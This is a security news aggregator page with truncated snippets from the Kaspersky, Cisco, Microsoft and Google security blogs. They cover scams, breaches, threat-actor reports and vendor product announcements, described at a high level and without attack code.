The only solution is to disable comments entirely (on GitHub this can be done for up to six months), but that deprives developers of feedback.

On GitLab the comment mechanics are similar, and there too files can be published via comments that are never actually submitted.

Malicious campaigns have already been found in which "comments" with files supposedly containing a game-cheating application are left in Microsoft repositories.

How to protect yourself from malicious content on GitHub and GitLab

While this design feature, which allo…

1 week, 2 days ago @ kaspersky.ru
What is credential stuffing | Kaspersky Blog

Every year millions of accounts are compromised by credential stuffing attacks.

In this post we look in more detail at how credential stuffing works, what data attackers use, and how to protect an organization's resources from such attacks.

How credential stuffing attacks work

Credential stuffing is one of the most effective kinds of attack on user accounts.

Such attacks use huge databases of previously obtained logins and passwords for accounts on various platforms.

How to protect against credential stuffing attacks

To protect an organization's resources from credential stuffing, we recommend …

1 week, 3 days ago @ kaspersky.ru
Googerteller lets you hear what tracking sounds like | Kaspersky Blog

Unfortunately, Googerteller is distributed only as source code on GitHub, which anyone wishing to hear online tracking with their own ears must compile on their computer before running it.

The code of the original Googerteller for Linux, macOS and other X systems is available here, and here is a "fan version" for Windows, GoogeDotTeller.

The only way to try Googerteller without compiling is a "Googerteller-inspired" plugin for Mozilla Firefox (its source code is published here).

The Listening Back browser extension, on the other hand, remains available in the official extension stores, both for Google Chrome and for Mozilla Firefox.

And then, launch…

1 week, 4 days ago @ kaspersky.ru
Information security in "The Bad Batch" | Kaspersky Blog

This year the illustrative material is the just-finished third season of the animated series Star Wars: The Bad Batch.

Secrecy of the Tantiss base

Doctor Hemlock, the direct head of the Tantiss base and of the "Necromancer" research project, enjoys the Emperor's full trust and has unlimited resources.

And unlike most of the Imperial leaders we have seen before, he approaches his task responsibly.

The coordinates of Tantiss are loaded directly into a ship's navigation computer immediately after takeoff and are somehow not stored in it.

The base's outer perimeter is guarded, among other things, by trained local predators.

1 week, 6 days ago @ kaspersky.ru
Dropbox Sign e-signature service hacked | Kaspersky Blog

The Dropbox Sign breach: how it happened and what leaked

Unknown attackers managed to compromise a Dropbox Sign service account and thereby gain access to an internal automated configuration tool of the platform.

As a protective measure, Dropbox reset the passwords of all Dropbox Sign accounts and terminated all active sessions, so users will have to log in to the service again and set a new password in the process.

Dropbox Sign, formerly known as HelloSign, is a separate Dropbox tool for cloud document workflow, primarily for signing electronic documents.

As the company stresses in its statement, the Dropbox Sign infrastructure is "largely…

2 weeks, 1 day ago @ kaspersky.ru
How Kaspersky stores passwords | Kaspersky Blog

How we check your data

We check whether your data and passwords have been compromised in three ways:

By email address, for users of Kaspersky Standard, Kaspersky Plus and Kaspersky Premium.

Why storing passwords in Kaspersky Password Manager is easier and safer

Memorizing all your passwords, or keeping them in a notes app, for example, is unsafe.

It creates, stores and automatically fills in strong, unique passwords on websites and in apps, checks whether they have been compromised, and generates two-factor authentication codes.

But how, then, do we check your passwords and look them up in leak databases?

And also, believe it or not, on many services, including Kaspersk…

2 weeks, 2 days ago @ kaspersky.ru
Kaspersky Thin Client 2.0 OS update | Kaspersky Blog

It is exactly such an operating system, Kaspersky Thin Client 2.0, that we propose to use in devices for connecting to virtual desktop infrastructure.

What is Kaspersky Thin Client, and what does version 2.0 have to offer?

Essentially, Kaspersky Thin Client 2.0 is an updated operating system for thin clients, built according to the Cyber Immune approach and therefore requiring no add-on security tools.

Kaspersky Thin Client is based on our KasperskyOS, which minimizes the risk of its compromise even under sophisticated attacks.

Kaspersky Thin Client 2.0 also supports connecting to individual business applications based on Microsoft Remote Desktop S…

3 weeks, 1 day ago @ kaspersky.ru
Toncoin cryptocurrency scam on Telegram | Kaspersky Blog

Today we describe a fraudulent scheme for "earning with Toncoin", a cryptocurrency built on Telegram's technologies.

Stage one: get ready

To begin, the scammers suggest registering a crypto wallet in an unofficial Telegram bot for storing crypto, and then entering the details of the newly created wallet in an "earning" bot that works by purchasing boosters.

Next, following the scammers' instructions, the victim has to buy 5.5–501 Toncoin (TON), where one TON at the current rate is worth roughly five to six dollars.

The pricier the plan, the higher the commission percentage: a "bike" costs five Toncoin and gives a 30% commission, a "rocket" costs 500 TON and gives 70%.

После этого, по задумке мошенников, жертва дол…

3 weeks, 2 days ago @ kaspersky.ru
Content filtering in KSMG 2.1 | Kaspersky Blog

As a result, a huge number of confirmations, account activation links and similar emails land in the mailbox.

In particular, in the example of an attack via registration mechanisms given above, the operator can block emails by the presence in the Subject field of the word "registration" in various languages (Registrace | Registracija | Registration | Registrierung | Regisztráció).

As a result, the emails are automatically sent to quarantine without reaching the inbox or overloading the mail server.

Flexible filtering of business mailings

Of course, the new capabilities of our solution can be used for more than protection against email DDoS attacks.

Learn more about Kaspersky Secure Mail Gateway, part of the solution…

3 weeks, 3 days ago @ kaspersky.ru
How encrypted messages from ChatGPT and other chatbots can be read | Kaspersky Blog

What information can be extracted from intercepted AI chatbot messages

Of course, chatbots send messages in encrypted form.

To understand what happens during this attack, we have to dig a little into the mechanics of LLMs and chatbots.

So, to then reconstruct the text of the original message from the resulting sequence of token lengths, the researchers used an LLM.

At least two AI chatbot developers, Cloudflare and OpenAI, have already responded to the publication of the research and started using the padding method mentioned above, which was devised precisely to counter this kind of attack.

Probably the other chatbot developers w…

3 weeks, 5 days ago @ kaspersky.ru
Group-IB Blog
last post None
Cisco Security Blog
last post 21 hours ago
Accessing Secure Client Cloud Management after the SecureX EoL

With the SecureX End of Life (EoL) quickly approaching on July 31, 2024, we want to ensure you have accurate information on how you will be able to continue accessing Cisco Secure Client Cloud Management capabilities.

Client Management capabilities are not going away as part of the SecureX EoL; the functionality is simply migrating to the Cisco Security Cloud Control service.

All customers entitled to Cisco Secure Client are eligible to use Secure Client Cloud Management via Cisco Security Cloud Control.

Device Insights capabilities are not part of Secure Client Cloud Management and will not be available in the new interface.

If you have not previously deployed Secure Client Management capa…

21 hours ago @ blogs.cisco.com
Email Security Reinvented: How AI is Revolutionizing Digital Defense

Cisco Secure Email Threat Defense uses these models to leverage multiple detection engines that simultaneously evaluate different portions of an incoming email to detect malicious intent while allowing legitimate messages to go through.

However, if we consider the malicious messages, 90% of them come from new senders that were never seen before.

When considering AI-driven email security, one thing is clear: the landscape of digital defense has been forever altered.

You can count on the Cisco Secure Email Threat Defense to keep your business and information secure.

To read more about the AI in Secure Email Threat Defense, read the white paper.

1 day, 21 hours ago @ blogs.cisco.com
Black Hat Asia 2024 NOC: Cisco Security Cloud

Cisco is honored to be a partner of the Black Hat NOC (Network Operations Center), and this was our seventh year supporting Black Hat Asia.

The Cisco contributions to the network and security operations evolved with the needs of the customer to include more components of the Cisco Security Cloud.

We appreciate alphaMountain.ai, Pulsedive and Recorded Future donating full licenses to Cisco for use in the Black Hat Asia 2024 NOC.

In most cases, they traced the anomaly to an authorized Black Hat Training or Briefing source and closed such cases as “Black Hat Positive”, meaning you would not allow this on your production network, but for Black Hat it is business as usual.

During the confere…

2 days, 21 hours ago @ blogs.cisco.com
Secure Firewall & Multicloud Defense: Secure Connectivity With Simplified Policy Across Clouds

Today, we’re bringing on-prem and cloud security together into one unified platform through the Cisco Security Cloud to marry the power of Cisco Secure Firewall and Cisco Multicloud Defense.

As we continue to innovate across the Cisco Security Cloud, synergies across the network security portfolio will continue to grow.

The launch of these shared capabilities between Cisco Secure Firewall and Cisco Multicloud Defense is a significant step towards converging the fabrics of best-in-class data center and cloud security to protect customers from ground to cloud.


1 week, 2 days ago @ blogs.cisco.com
Accelerating SaaS security certifications to maximize market access

They must properly manage their solution development and operational practices to meet the varying demands of each market, while offering high levels of data security and privacy to their users.

Today, we are proud to announce the public availability of the Cisco Cloud Controls Framework v3.0.

This update extends the CCF with additional, globally accepted, security compliance frameworks and certifications.


1 week, 3 days ago @ blogs.cisco.com
Empowering Cybersecurity with AI: The Future of Cisco XDR

I am pleased to announce the launch of the AI Assistant in XDR as a part of our Breach Protection Suite.

In our RSAC 2023 announcement, we introduced a vision of our Cisco SOC Assistant, designed to expedite threat detection and response.

Enable Seamless Collaboration Across Security Teams

The Cisco AI Assistant, embedded within XDR, facilitates team collaboration using Webex, Teams, or Slack.

This is the transformative power of the Cisco XDR combined with Cisco’s AI Assistant revolutionizing enterprise security.

Learn how Cisco Breach Protection Suite, Cisco XDR and our AI Assistant can simplify your security operations.

1 week, 4 days ago @ blogs.cisco.com
Cisco Hypershield – Our Vision to Combat Unknown Vulnerabilities

What about the yet-to-be-announced and even yet-to-be-discovered vulnerabilities, the unknown vulnerabilities?

Hypershield’s unknown vulnerability protection can help detect and block unknown vulnerabilities within runtime workload environments.

This enables Hypershield to create an application behavior graph and an application fingerprint.

Advanced methods for unknown vulnerability protection

Hypershield uses various methods to detect and contain unknown vulnerabilities.

Application-specific behavior classifications

As described above, one method Hypershield employs to identify unknown vulnerabilities involves contrasting CWEs with the application behavior graph.

1 week, 4 days ago @ blogs.cisco.com
Cisco & Splunk: A Complete SOC Platform Purpose-Built for the AI-Driven Future

That is why I am so excited about the integration of Cisco XDR and Splunk Enterprise Security.

We can answer those questions through the integration of Cisco XDR with Splunk Enterprise Security.

Cisco XDR and Splunk Enterprise Security is the most complete security operations platform in the market today because it doesn’t try to force the company into something that it’s not — or not yet.

We’re looking forward to connecting with you at our booth and discussing ways you can accelerate your SOC with Cisco + Splunk.


1 week, 4 days ago @ blogs.cisco.com
Cisco Hypershield: Reimagining Security

Cisco has created such a fabric — Cisco Hypershield — that we discuss in the paragraphs below.

Virtual/Container Network Enforcement Point: Here, a software network enforcement point runs inside a virtual machine or container.

Centralized security policy

The usual retort to distributed security enforcement is the nightmare of managing independent security policies per enforcement point.

The administrator’s faith in the security fabric — Cisco Hypershield — deepens after a few successful runs through the segmentation process.

Conclusion

In both the examples discussed above, we see Cisco Hypershield function as an effective and efficient security fabric.

1 month ago @ blogs.cisco.com
Cisco Hypershield: A New Era of Distributed, AI-Native Security

I’m proud to announce Cisco Hypershield, the first truly distributed, AI-native system that puts security wherever it needs to be: in every software component of every application running on your network; on every server; and in your public or private cloud deployments.

They converted these products into thousands of pieces of software — including security software — that could run on every server.

Built within the Cisco Security Cloud, Hypershield, plus the processing, protection, and data capabilities within Splunk, will create a transformative hyperscale datacenter that not only leads the AI revolution, but protects it.

We’ll share more soon, but for now, you can expect Cisco Hypershield…

1 month ago @ blogs.cisco.com
Supercharging Cisco XDR with AI and Identity Intelligence at RSAC 2024

Cisco XDR is a leader in providing comprehensive threat detection and response across the entire attack surface.

Cutting-Edge Innovations in Cisco XDR

At the heart of these innovations is the Cisco AI Assistant in XDR.

The Cisco AI Assistant gives analysts contextual insights, guided responses, and best next steps.

We will also show Cisco Identity Intelligence capabilities.

Cisco XDR can detect and respond to sophisticated identity-based attacks with accuracy and speed by incorporating identity as a source of telemetry.

1 month ago @ blogs.cisco.com
Synergizing Advanced Identity Threat Detection & Response Solutions

Two leading players in this space, Cisco’s Duo Security and Cisco Identity Intelligence, have emerged as champions in Identity Threat Detection & Response.

The Power of Identity Threat Detection & Response

Identity Threat Detection & Response (ITDR) has become a vital aspect of modern cybersecurity.

Cisco Identity Intelligence: Elevating Cybersecurity Preparedness

Cisco Identity Intelligence brings an additional layer of protection to the table with its advanced capabilities in anomaly detection and behavioral analytics.

How Cisco Identity Intelligence Complements Cisco’s Duo Security

Enhanced Anomaly Detection: While Cisco’s Duo Security provides robust MFA and access controls, Cisco Identity…

1 month ago @ blogs.cisco.com
Cisco Telemetry Broker (CTB) 2.1 Launch

Cisco Telemetry Broker (CTB) Release 2.1.3 is generally available as of March 25, 2024.

Cisco Telemetry Broker is the answer.

It can broker hybrid cloud data, filter unneeded data, and transform data into a more usable format.

Produces Telemetry for Devices that Cannot Generate NetFlow Natively

To support the notion of an intelligent telemetry plane, there is a need to generate NetFlow for devices that might not be capable of generating the protocol natively.

Additionally, the CTB Broker to CTB Manager data bandwidth was optimized, which improves overall performance significantly and allows the Manager node to scale.

1 month ago @ blogs.cisco.com
Cisco Secure Access Wins Global Security Service Edge Customer Value Leadership Award

It’s one thing to claim leadership in cloud security; it’s another to have that leadership acknowledged by industry experts.

That’s why we’re thrilled to announce our recent recognition by Frost & Sullivan as the 2024 Customer Value Leader in the Global Security Service Edge Industry.

Frost & Sullivan’s Customer Value Leadership Award recognizes the company that offers products or services customers find superior for the overall price, performance, and quality.

Vendors are evaluated on business impact criteria (including financial performance, customer acquisition, operational efficiency, growth potential, and human capital) and customer impact criteria (price/performance value, customer pu…

1 month ago @ blogs.cisco.com
Defusing the threat of compromised credentials

These attackers used compromised credentials to repeatedly attempt to sign in to the company’s real Microsoft 365 page, triggering the series of MFA notifications—an attack technique known as MFA exhaustion.

According to this quarter’s Talos IR report, using compromised credentials on valid accounts was one of two top initial access vectors.

How credentials are compromised

Phishing, while one of the most popular methods, isn’t the only way that attackers gather compromised credentials.

Reducing the impact of compromised credentials

It goes without saying that protecting credentials from being compromised and abused is important.

To illustrate, let’s look at when the threat actor begins hammer…

1 month, 1 week ago @ blogs.cisco.com
Microsoft Security
last post 2 days, 17 hours ago
Threat actors misusing Quick Assist in social engineering attacks leading to ransomware

Since mid-April 2024, Microsoft Threat Intelligence has observed the threat actor Storm-1811 misusing the client management tool Quick Assist to target users in social engineering attacks.

Microsoft Defender for Endpoint detects components of activity originating from Quick Assist sessions as well as follow-on activity, and Microsoft Defender Antivirus detects the malware components associated with this activity.

Social engineering

One of the social engineering techniques used by threat actors to obtain initial access to target devices using Quick Assist is through vishing attacks.

U.S. Department of Health and Human Services, Health Sector Cybersecurity Coordination Center

For the …

2 days, 17 hours ago @ microsoft.com
Microsoft is again named a Leader in the 2024 Gartner® Magic Quadrant™ for Security Information and Event Management

In a significant step, we have launched the unified security operations platform, a single experience across security information and event management (SIEM), extended detection and response (XDR), and Microsoft Copilot for Security.

Microsoft Sentinel Build next-generation security operations powered by the cloud and AI.

Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

1 Gartner® Magic Quadrant™ for Security Information and Event Management, Andrew Davies, Mitchell Schneider, Rustam Malik, Eric Ahlm, May 8, 2024.

Gartner research publications consist of the opinions of Gartner’s Research & Advisory organization and should …

4 days, 17 hours ago @ microsoft.com
How implementing a trust fabric strengthens identity and network

This is the distinction between identity fabric and the next step: trust fabric.

The vision for how to conceptually architect and move forward with this comprehensive defense-in-depth cybersecurity strategy is the same as a trust fabric.

Zero Trust and a trust fabric

Zero Trust is the term for an evolving set of cybersecurity paradigms that move cybersecurity defenses from static, network-based perimeters to focus on users, assets, and resources.

The Zero Trust principles are foundational to how organizations should architect a trust fabric, and instructional for how to build technology to bring the trust fabric to life.

The Microsoft trust fabric

At Microsoft, we continue to design and innov…

1 week, 2 days ago @ microsoft.com
Microsoft announces the 2024 Microsoft Security Excellence Awards winners

At this year’s Microsoft Security Excellence Awards, we took a journey through the evolution of cybersecurity from the 1950s to today.

“I’m so pleased to congratulate this year’s Microsoft Security Excellence awards recipients and to acknowledge all those who were nominated,” said Vasu Jakkal, Corporate Vice President, Microsoft Security Business.

Security MSSP of the Year: Vasu Jakkal, Corporate Vice President, Microsoft Security Business.

Security ISV of the Year: Vasu Jakkal, Corporate Vice President, Microsoft Security Business.

To learn more about Microsoft Security solutions, visit our website.

1 week, 3 days ago @ microsoft.com
New capabilities to help you secure your AI transformation

Today, new capabilities are now available in Microsoft Defender and Microsoft Purview to help organizations secure and govern generative AI applications at work.

Secure your AI transformation with Microsoft Security

Wherever your organization is in your AI transformation, you will need comprehensive security controls to secure and govern your AI applications and data throughout their lifecycle—development, deployment, and runtime.

With the new capabilities announced today, Microsoft becomes the first security provider to deliver end-to-end AI security posture management, threat protection, data security, and governance for AI.

Discover new AI attack surfaces, strengthen your AI security posture,…

1 week, 4 days ago @ microsoft.com
Security above all else—expanding Microsoft’s Secure Future Initiative

Last November, we launched the Secure Future Initiative (SFI) to prepare for the increasing scale and high stakes of cyberattacks.

Monitor and detect threats

Comprehensive coverage and automatic detection of threats to Microsoft production infrastructure and services.

As part of this, we are taking the following actions:

Maintain a current inventory across 100% of Microsoft production infrastructure and services.

Automatically detect and respond rapidly to anomalous access, behaviors, and configurations across 100% of Microsoft production infrastructure and services.

Driving continuous improvement

The Secure Future Initiative empowers all of Microsoft to implement the needed changes to deliver…

2 weeks ago @ microsoft.com
Microsoft introduces passkeys for consumer accounts

Today, we’re announcing passkey support for Microsoft consumer accounts, the next step toward our vision of simple, safe access for everyone.

Starting today, you can use a passkey to access your Microsoft account using your face, fingerprint, or device PIN on Windows, Google, and Apple platforms.

Creating a passkey for your Microsoft account

Creating a passkey for your Microsoft account is easy.

Signing into your Microsoft account using a passkey

When you sign in to your Microsoft account, you can use your passkey by choosing Sign-in options and then selecting face, fingerprint, PIN, or security key.

Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news an…

2 weeks, 1 day ago @ microsoft.com
Microsoft named overall leader in KuppingerCole Leadership Compass for ITDR

This blog was co-authored by Alex Weinert, VP Identity Security and Ramya Chitrakar, CVP Apps and Identity.

Today we are thrilled to announce that Microsoft has been recognized as an overall leader in the KuppingerCole Leadership Compass Identity Threat Detection and Response: IAM Meets the SOC.

Figure 1: ITDR Leadership compass with Microsoft as a leader

Streamline your identity protection with ITDR and generative AI

At Microsoft, we look at ITDR as a set of capabilities at the intersection of Identity and Access Management (IAM) and Extended Detection and Response (XDR).

Proactively protect your on-premises resources and harden your identity posture: Misconfigurations in identity infrastru…

2 weeks, 2 days ago @ techcommunity.microsoft.com
“Dirty stream” attack: Discovering and mitigating a common vulnerability pattern in Android apps

Microsoft remains committed to working with the security community to share vulnerability discoveries and threat intelligence to protect users across platforms.

We also wish to thank Google’s Android Application Security Research team for their partnership in resolving this issue.

For example, it’s very common for Android applications to read their server settings from the shared_prefs directory.

Recommendations

Recognizing that this vulnerability pattern may be widespread, we shared our findings with Google’s Android Application Security Research team.

We collaborated with Google to author guidance for Android application developers to help them recognize and avoid this pattern.

2 weeks, 2 days ago @ microsoft.com
Investigating industrial control systems using Microsoft’s ICSpector open-source framework

Challenges in ICS forensics

ICS forensics differs from standard IT forensics because ICS environments have distinctive features that set them apart.

In contrast, forensics in OT environments involves analyzing ICS data, including data from sensors and controllers used in manufacturing and industrial settings.

Specialized tools and techniques have started to emerge to address the unique challenges of conducting investigations in ICS environments.

Defender for IoT, or any other OT security solution, can help with both proactive and reactive OT incident response.

To get started with OT security, watch the “Introduction to ICS/OT Security” webinar series, hosted by Microsoft Security Commu…

3 weeks, 1 day ago @ techcommunity.microsoft.com
5 ways a CNAPP can strengthen your multicloud security environment

Insight #3: Effective cybersecurity takes a good partner

Keeping user needs in mind, Microsoft has its own CNAPP solution—Microsoft Defender for Cloud.

Operationalizing Microsoft Defender for Cloud takes both integrating it into daily operations and satisfying your users’ needs by continuously evolving cloud security.

Strengthening the SOC even further is a new Microsoft Defender for Cloud integration with Microsoft Defender XDR.

The future holds significant promise for CNAPP, and Microsoft is leading in this effort with solutions like Microsoft Defender for Cloud.

Also, follow us on LinkedIn (Microsoft Security)…

3 weeks, 2 days ago @ microsoft.com
New Microsoft Incident Response guide helps simplify cyberthreat investigations

To help like-minded defenders tackle this difficult task, Microsoft Incident Response experts have created a guide on using Windows Internals for forensic investigations.

Guidance for Incident Responders

The new guide from the Microsoft Incident Response team helps simplify forensic investigations.

Understanding these artifacts will strengthen your ability to conduct Windows forensic analysis.

Shimcache’s forensic evolution: The Shimcache has long served as a source of forensic information, particularly as evidence of program execution.

Forensic insights with SRUM: SRUM’s tracking of application execution, network activity, and resource consumption is a boon for forensic analysts.

3 weeks, 3 days ago @ microsoft.com
Analyzing Forest Blizzard’s custom post-compromise tool for exploiting CVE-2022-38028 to obtain credentials

Microsoft Threat Intelligence is publishing results of our longstanding investigation into activity by the Russian-based threat actor Forest Blizzard (STRONTIUM) using a custom tool to elevate privileges and steal credentials in compromised networks.

Forest Blizzard often uses publicly available exploits in addition to CVE-2022-38028, such as CVE-2023-23397.

In addition to patching, this blog details several steps users can take to defend themselves against attempts to exploit Print Spooler vulnerabilities.

Forest Blizzard primarily targets government, energy, transportation, and non-governmental organizations in the United States, Europe, and the Middle East.

To hear stories and insights f…

3 weeks, 4 days ago @ microsoft.com
Attackers exploiting new critical OpenMetadata vulnerabilities on Kubernetes clusters

Microsoft recently uncovered an attack that exploits new critical vulnerabilities in OpenMetadata to gain access to Kubernetes workloads and leverage them for cryptomining activity.

Attack flow

For initial access, the attackers likely identify and target Kubernetes workloads of OpenMetadata exposed to the internet.

Once they identify a vulnerable version of the application, the attackers exploit the mentioned vulnerabilities to gain code execution on the container running the vulnerable OpenMetadata image.

In this specific case, the attackers’ actions triggered Microsoft Defender for Containers alerts, identifying the malicious activity in the container.

Microsoft Defender Cloud Security Pos…

1 month ago @ microsoft.com
New Microsoft guidance for the DoD Zero Trust Strategy

Today, we are excited to announce Zero Trust activity-level guidance for DoD Components and DIB partners implementing the DoD Zero Trust Strategy.

In this blog, we’ll review the DoD Zero Trust Strategy and discuss how our new guidance helps DoD Components and DIB partners implement Zero Trust.

We’ll cover the Microsoft Zero Trust platform and relevant features for meeting DoD’s Zero Trust requirements, and close with real-world DoD Zero Trust deployments.

Microsoft supports the DoD’s Zero Trust Strategy

The DoD released its formal Zero Trust Strategy in October 2022. The strategy is a security framework and mindset that sets a path for achieving Zero Trust.

There are 152 Zero Trust activitie…

1 month ago @ microsoft.com
Google Online Security Blog
last post 2 days, 16 hours ago
I/O 2024: What’s new in Android security and privacy

And as their tactics evolve in sophistication and scale, we continually adapt and enhance our advanced security features and AI-powered protections to help keep Android users safe.

Google Play Protect live threat detection

Google Play Protect now scans 200 billion Android apps daily, helping keep more than 3 billion users safe from malware.

The detection of suspicious behavior is done on device in a privacy preserving way through Private Compute Core, which allows us to protect users without collecting data.

This is helpful for apps that want to hide sensitive information from other apps and protect users from scams.

2 days, 16 hours ago @ security.googleblog.com
Google and Apple deliver support for unwanted tracking alerts in Android and iOS

Google and Apple have worked together to create an industry specification – Detecting Unwanted Location Trackers – for Bluetooth tracking devices that makes it possible to alert users across both Android and iOS if such a device is unknowingly being used to track them.

This will help mitigate the misuse of devices designed to help keep track of belongings.

Google is now launching this capability on Android 6.0+ devices, and today Apple is implementing this capability in iOS 17.5.

If a user gets such an alert on their Android device, it means that someone else’s AirTag, Find My Device network-compatible tracker tag, or other industry specification-compatible Bluetooth tracker is moving with …

4 days, 16 hours ago @ security.googleblog.com
Your Google Account allows you to create passkeys on your phone, computer and security keys

Passkeys and security keys

Passkeys are an evolution of security keys, meaning users get the same security benefits, but with a much simplified experience.

By storing the passkey on a security key, users can ensure that passkeys are only available when the security key is plugged into their device, creating a stronger security posture.

Security keys provide an alternate way to use your passkeys across your devices: by bringing your security keys with you.

This replaces your remotely stored password with the PIN you used to unlock your security key, which improves user security.

However, users are still required to present two security keys when enrolling into the program.

2 weeks, 1 day ago @ security.googleblog.com
Detecting browser data theft using Windows Event Logs

Background

Chromium-based browsers on Windows use DPAPI (Data Protection API) to secure local secrets such as cookies, passwords, etc.

This event was added to the Microsoft-Windows-Crypto-DPAPI stream which manifests in the Event Log in the Applications and Services Logs > Microsoft > Windows > Crypto-DPAPI part of the Event Viewer tree.

Here is the Chrome browser launching from explorer:

4688 2 0 13312 0 0x8020000000000000 78258343 Security WIN-GG82ULGC9GO.contoso.local S-1-5-18 WIN-GG82ULGC9GO$ CONTOSO 0xe8c85cc 0x17eac C:\Program Files\Google\Chrome\Application\chrome.exe %%1938 0x16d8 "C:\Program Files\Google\Chrome\Application\chrome.exe" S-1-0-0 - - 0x0 C:\Windows\explorer.exe…

2 weeks, 3 days ago @ security.googleblog.com
How we fought bad apps and bad actors in 2023

A safe and trusted Google Play experience is our top priority.

The Alliance will support industry-wide adoption of app security best practices and guidelines, as well as countermeasures against emerging security risks.

This new capability has already detected over 5 million new, malicious off-Play apps, which helps protect Android users worldwide.

Looking Ahead

Protecting users and developers on Google Play is paramount and ever-evolving.

We're launching new security initiatives in 2024, including removing apps from Play that are not transparent about their privacy practices.

2 weeks, 4 days ago @ security.googleblog.com
Accelerating incident response using generative AI

Using generative AI we could write summaries 51% faster while also improving the quality of them.

Our incident response approach

When suspecting a potential data incident, for example, we follow a rigorous process to manage it.

Closure: After remediation efforts conclude and the data incident is resolved, the incident and the response are reviewed to identify key areas for improvement.

Continuous improvement: This is crucial for the development and maintenance of incident response programs.

This experiment showed that generative AI can evolve beyond high level summarization and help draft complex communications.

3 weeks ago @ security.googleblog.com
Uncovering potential threats to your web application by leveraging security reports

In this blog post, we'll share how the Google security team uses the Reporting API to detect potential issues and identify the actual problems causing them.

Note that in a typical roll out, we iterate steps 1 through 3 to ensure that we have triaged all violation reports.

With the Reporting API, we have the ability to run this cycle using a unified reporting endpoint and a single schema for several security features.

Most reports generated via the Reporting API are violation reports, but not all — other types include deprecation reports and crash reports.

Over the years, Google has developed a number of techniques to collect, digest, and summarize violation reports into root causes.

3 weeks, 3 days ago @ security.googleblog.com
Prevent Generative AI Data Leaks with Chrome Enterprise DLP

Generative AI has emerged as a powerful and popular tool to automate content creation and simple tasks.

In this blog post, we'll explore reporting and enforcement policies that enterprise security teams can implement within Chrome Enterprise Premium for data loss prevention (DLP).

Chrome Enterprise DLP rules give IT admins granular control over browser activities, such as entering financial information in Gen AI websites.

As enterprises work through their policies and processes involving GenAI, Chrome Enterprise Premium empowers them to strike the balance that works best.

Learn more about how Chrome Enterprise can secure businesses just like yours here.

4 weeks, 1 day ago @ security.googleblog.com
How we built the new Find My Device network with user security and privacy in mind

How location crowdsourcing works on the Find My Device network

The Find My Device network locates devices by harnessing the Bluetooth proximity of surrounding Android devices.

Nearby Android devices participating in the Find My Device network report the location of the Bluetooth tag.

With end-to-end encrypted location data, Google cannot decrypt, see, or otherwise use the location data.

The Find My Device network is also compliant with the integration version of the joint industry standard for unwanted tracking.

We have an unwavering commitment to continue to improve user protections on Find My Device and prioritize user safety.

1 month, 1 week ago @ security.googleblog.com
Google Public DNS’s approach to fight against cache poisoning attacks

In this post, we will look at DNS cache poisoning attacks and how Google Public DNS addresses the risks associated with them.

DNS Cache Poisoning Attacks

DNS lookups in most applications are forwarded to a caching resolver (which could be local or an open resolver like.

For an excellent introduction to cache poisoning attacks, please see “An Illustrated Guide to the Kaminsky DNS Vulnerability”.

Cache poisoning mitigations in Google Public DNS

Improving DNS security has been a goal of Google Public DNS since our launch in 2009.

To enhance DNS security, we recommend that DNS server operators support one or more of the security mechanisms described here.

1 month, 2 weeks ago @ security.googleblog.com
Address Sanitizer for Bare-metal Firmware

Address Sanitizer (ASan) overview

Address Sanitizer is a compiler-based instrumentation tool used to identify invalid memory access operations at runtime.

The KASan runtime routines implemented in the Linux kernel serve as a great example of how to define a KASan runtime for targets which aren’t supported by default with -fsanitize=address.

Memory access check

The routines __asan_loadXX_noabort and __asan_storeXX_noabort perform verification of memory access at runtime.

This routine takes as input a target memory address and sets the corresponding byte in shadow memory to the value of YY.

Essentially, we would need to instrument the memory allocator with the code which unpoisons KASan sha…

1 month, 3 weeks ago @ security.googleblog.com
Real-time, privacy-preserving URL protection

That’s why we're excited to announce a new version of Safe Browsing that will provide real-time, privacy-preserving URL protection for people using the Standard protection mode of Safe Browsing in Chrome.

Introducing real-time, privacy-preserving Safe Browsing

How it works

In order to transition to real-time protection, checks now need to be performed against a list that is maintained on the Safe Browsing server.

With OHTTP, Safe Browsing does not see your IP address, and your Safe Browsing checks are mixed amongst those sent by other Chrome users.

Since the privacy server doesn’t know the private key, it cannot decrypt the hash prefixes, which offers privacy from the privacy server itself.

I…

2 months ago @ security.googleblog.com
Vulnerability Reward Program: 2023 Year in Review

To further our engagement with top security researchers, we also hosted our yearly security conference ESCAL8 in Tokyo.

Android and Google Devices

In 2023, the Android VRP achieved significant milestones, reflecting our dedication to securing the Android ecosystem.

The Google Play Security Reward Program continued to foster security research across popular Android apps on Google Play.

All of this resulted in $2.1M in rewards to security researchers for 359 unique reports of Chrome Browser security bugs.

Thank you to the Chrome VRP security researcher community for your contributions and efforts to help us make Chrome more secure for everyone!

2 months ago @ security.googleblog.com
Secure by Design: Google’s Perspective on Memory Safety

The latest news and insights from Google on security and safety on the Internet

2 months, 2 weeks ago @ security.googleblog.com
Piloting new ways of protecting Android users from financial fraud

Google Play, for example, carries out rigorous operational reviews to ensure app safety, including proper high-risk API use and permissions handling.

We recently launched enhanced Google Play Protect real-time scanning to help better protect users against novel malicious Internet-sideloaded apps.

This feature, now deployed on Android devices with Google Play Services in India, Thailand, Singapore and Brazil, has already made a significant impact on user safety.

To help better protect Android users from these financial fraud attacks, we are piloting enhanced fraud protection with Google Play Protect.

Our commitment to protecting Android users

We believe industry collaboration is essential to …

3 months, 1 week ago @ security.googleblog.com